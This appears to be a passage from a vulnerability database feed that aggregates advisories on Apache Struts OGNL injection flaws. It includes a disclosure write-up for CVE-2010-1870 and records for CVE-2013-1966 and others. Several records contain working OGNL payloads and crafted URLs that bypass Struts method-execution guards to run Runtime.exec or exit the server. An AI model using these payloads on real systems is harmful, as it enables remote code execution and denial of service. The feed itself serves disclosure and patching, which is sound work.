@java.lang.Runtime@getRuntime()\r\n#rt.exec('mkdir /tmp/PWNED')\r\n \r\nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. 
To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\r\n \r\n \r\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den\r\nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti\r\nme()))=1\r\n \r\n \r\nFixing CVE-2010-1870\r\nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.\r\n \r\n \r\nIn cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug.\r\n \r\nTimeline\r\nMay 31st - email to security@struts.apache.org with vulnerability report.\r\nJune 4th - no response received, contacted developers again.\r\nJune 5th - had to find an XWork developer on IRC to look at this.\r\nJune 16th - Atlassian fixes vulnerability in its products. 
Atlassian and Struts developers worked together in coming up with the fix.\r\nJune 20th - 1-line fix commited\r\nJune 29th - Struts 2.2.0 release voting process started and is still going...\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19954", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T13:32:55", "description": "## \u6f0f\u6d1e\u8be6\u60c5\r\n\r\n\u5728struts2\u4e2d\uff0cDefaultActionMapper\u7c7b\u652f\u6301\u4ee5\"action:\"\u3001\"redirect:\"\u3001\"redirectAction:\"\u4f5c\u4e3a\u5bfc\u822a\u6216\u662f\u91cd\u5b9a\u5411\u524d\u7f00\uff0c\u4f46\u662f\u8fd9\u4e9b\u524d\u7f00\u540e\u9762\u540c\u65f6\u53ef\u4ee5\u8ddfOGNL\u8868\u8fbe\u5f0f\uff0c\u7531\u4e8estruts2\u6ca1\u6709\u5bf9\u8fd9\u4e9b\u524d\u7f00\u505a\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u5229\u7528OGNL\u8868\u8fbe\u5f0f\u8c03\u7528java\u9759\u6001\u65b9\u6cd5\u6267\u884c\u4efb\u610f\u7cfb\u7edf\u547d\u4ee4\u3002\r\n\r\n\u8fd9\u91cc\u4ee5\u201credirect:\u201d\u524d\u7f00\u4e3e\u4f8b\uff0cstruts2\u4f1a\u5c06\u201credirect:\u201d\u524d\u7f00\u540e\u9762\u7684\u5185\u5bb9\u8bbe\u7f6e\u5230redirect.location\u5f53\u4e2d\uff0c\u8fd9\u91cc\u6211\u4eec\u4e00\u6b65\u6b65\u8ddf\u8e2a\uff0c\u9996\u5148\u662f\u8fd9\u4e2agetMapping\u51fd\u6570\u8ddf\u5165\r\n\r\n\r\n\r\n\u8fd9\u91cc\u4e00\u76f4\u5230\u8fd9\u4e2ahandleSpecialParameters()\uff0c\u7ee7\u7eed\u8ddf\u5165\r\n\r\n\r\n\r\n\r\n\r\n\u8fd9\u91cc\u771f\u6b63\u4f20\u5165OGNL\u8868\u8fbe\u5f0f\u662f\u5728\u8fd9\u4e2aparameterAction.execute()\u4e2d\uff0c\u7ee7\u7eed\u8ddf\u5165\u6765\u5230DefaultActionMapper.java\u7684\u4ee3\u7801\r\n\r\n\r\n\r\n\u7136\u800c\u4e0a\u9762\u7684\u8fc7\u7a0b\u53ea\u662f\u4f20\u9012OGNL\u8868\u8fbe\u5f0f\uff0c\u771f\u6b63\u6267\u884c\u662f\u5728\u540e\u9762\uff0c\u8fd9\u91cc\u662f\u5728FilterDispatcher\u7c7b\u4e2d\u7684dispatcher.serviceAction()\u65b9\u6cd5\uff0c\u8fd9\u91cc\u7684mapping\u5bf9\u8c61\u4e2d\u8bbe\u7f6e\u4e86\u4f20\u5165\u7684OGNL\r\n\r\n\r\n\r\n\u8fd9\u9
1cc\u8ddf\u5165\u65b9\u6cd5\u6700\u7ec8\u4f1a\u5728TextParseUtil\u8fd9\u4e2a\u7c7b\u7684\u8c03\u7528stack.findValue()\u65b9\u6cd5\u6267\u884cOGNL\u3002\r\n\r\n\r\n\r\n\u8be6\u60c5\u6765\u6e90\uff1ahttp://drops.wooyun.org/papers/902", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69390", "id": "SSV:69390", "sourceData": "\n Friday, July 9, 2010\r\nCVE-2010-1870: Struts2/XWork remote command execution\r\nUpdate Tue Jul 13 2010: Added proof of concept\r\n\r\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\r\n\r\nIntroduction\r\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. 
OGNL (Object Graph Navigation Language) is what turns:\r\n\r\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\r\n\r\ninto\r\n\r\naction.getUser().getAddress().setCity("Bishkek")\r\naction.getUser().setFavoriteDrink("kumys")\r\n\r\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\r\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\r\n\r\nIn addition to property getting/setting, OGNL supports many more features:\r\n\r\n * Method calling: foo()\r\n * Static method calling: @java.lang.System@exit(1)\r\n * Constructor calling: new MyClass()\r\n * Ability to work with context variables: #foo = new MyClass()\r\n * And more...\r\n\r\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\r\n\r\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\r\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\r\n\r\nOGNL Context variables\r\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\r\n\r\n * #application\r\n * #session\r\n * #request\r\n * #parameters\r\n * #attr\r\n\r\nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. 
\r\n\r\nCVE-2010-1870\r\nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:\r\n\r\n * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.\r\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\r\n * #root\r\n * #this\r\n * #_typeResolver\r\n * #_classResolver\r\n * #_traceEvaluations\r\n * #_lastEvaluation\r\n * #_keepLastEvaluation\r\n\r\nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:\r\n\r\n#_memberAccess['allowStaticMethodAccess'] = true\r\n#foo = new java .lang.Boolean("false")\r\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\r\n#rt = @java.lang.Runtime@getRuntime()\r\n#rt.exec('mkdir /tmp/PWNED')\r\n\r\nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. 
To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\r\n\r\n\r\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den\r\nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti\r\nme()))=1\r\n\r\n\r\nFixing CVE-2010-1870\r\nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.\r\n\r\n\r\nIn cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug.\r\n\r\nTimeline\r\nMay 31st - email to security@struts.apache.org with vulnerability report.\r\nJune 4th - no response received, contacted developers again.\r\nJune 5th - had to find an XWork developer on IRC to look at this.\r\nJune 16th - Atlassian fixes vulnerability in its products. 
Atlassian and Struts developers worked together in coming up with the fix.\r\nJune 20th - 1-line fix commited\r\nJune 29th - Struts 2.2.0 release voting process started and is still going...\r\n\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-69390", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T17:42:34", "description": "No description provided by source.", "cvss3": {}, "published": "2013-05-24T00:00:00", "title": "Apache Struts2 includeParams\u5c5e\u6027\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2013-1966)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966"], "modified": "2013-05-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60807", "id": "SSV:60807", "sourceData": "\n \u6253\u5f00Struts Blank App\u4e2d\u7684 HelloWorld.jsp\u589e\u52a0\u7c7b\u4f3c\u4e0b\u5217\u4ee3\u7801\uff1a\r\n\r\n<s:url id="url" action="HelloWorld" includeParams="all">\r\n\r\n\u8fd0\u884c struts2-blank app\r\n\r\n\u8bbf\u95ee\u4e0b\u5217\u5730\u5740: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D\r\n\r\n\u5982\u679c\u8fd4\u56de"hacked"\uff0c\u5219\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60807", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "github": [{"lastseen": "2022-07-06T19:57:46", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-05-17T03:42:18", "type": "github", "title": "Improper Input Validation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2022-07-06T19:56:14", "id": "GHSA-383P-XQXX-RRMP", "href": "https://github.com/advisories/GHSA-383p-xqxx-rrmp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-08T19:57:56", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "github", "title": "Improper Control of Generation of Code in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2022-07-08T19:05:59", "id": "GHSA-WHMQ-V94Q-34P9", "href": "https://github.com/advisories/GHSA-whmq-v94q-34p9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-07-29T04:47:43", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-06-01T13:48:53", "type": "redhatcve", "title": "CVE-2016-3093", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2020-04-08T22:27:46", "id": "RH:CVE-2016-3093", "href": "https://access.redhat.com/security/cve/cve-2016-3093", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-15T08:54:48", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not 
properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-05-17T03:42:18", "type": "osv", "title": "Improper Input Validation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2022-08-15T08:54:33", "id": "OSV:GHSA-383P-XQXX-RRMP", "href": "https://osv.dev/vulnerability/GHSA-383p-xqxx-rrmp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-15T08:22:21", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "osv", "title": "Improper Control of Generation of Code in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2022-08-15T08:22:17", "id": "OSV:GHSA-WHMQ-V94Q-34P9", "href": "https://osv.dev/vulnerability/GHSA-whmq-v94q-34p9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:828C60321F2ABC177EBA08F435872B1B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:28", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. 
"info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2020-07-30T00:00:00", "id": "AKB:F287CDB5-FC29-49E2-B958-BAAE1EECEA70", "href": "https://attackerkb.com/topics/Sftg6M4yzi/cve-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-06T08:35:01", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "attackerkb", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-07-30T00:00:00", "id": "AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "href": "https://attackerkb.com/topics/xU2Ap2yNUC/cve-2012-0391", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2021-07-28T14:32:21", "description": "**Name**| d2sec_struts4 \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts4 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-07-20T03:37:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS4", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T03:37:00", "id": "D2SEC_STRUTS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:32:22", "description": "**Name**| d2sec_struts \n---|--- \n**CVE**| CVE-2010-1870 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2010-08-17T20:00:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-17T20:00:00", "id": "D2SEC_STRUTS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_struts2 \n---|--- \n**CVE**| CVE-2012-0391 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2012-01-08T15:55:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T15:55:00", "id": "D2SEC_STRUTS2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2021-12-28T23:21:05", "description": "Apache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a remote command execution vulnerability. \n \nThis issue is the same issue that the developer published as [S2-016](<http://struts.apache.org/release/2.3.x/docs/s2-016.html>) on July 16, 2013 \n \nNote that attacks leveraging this vulnerability have been confirmed. 
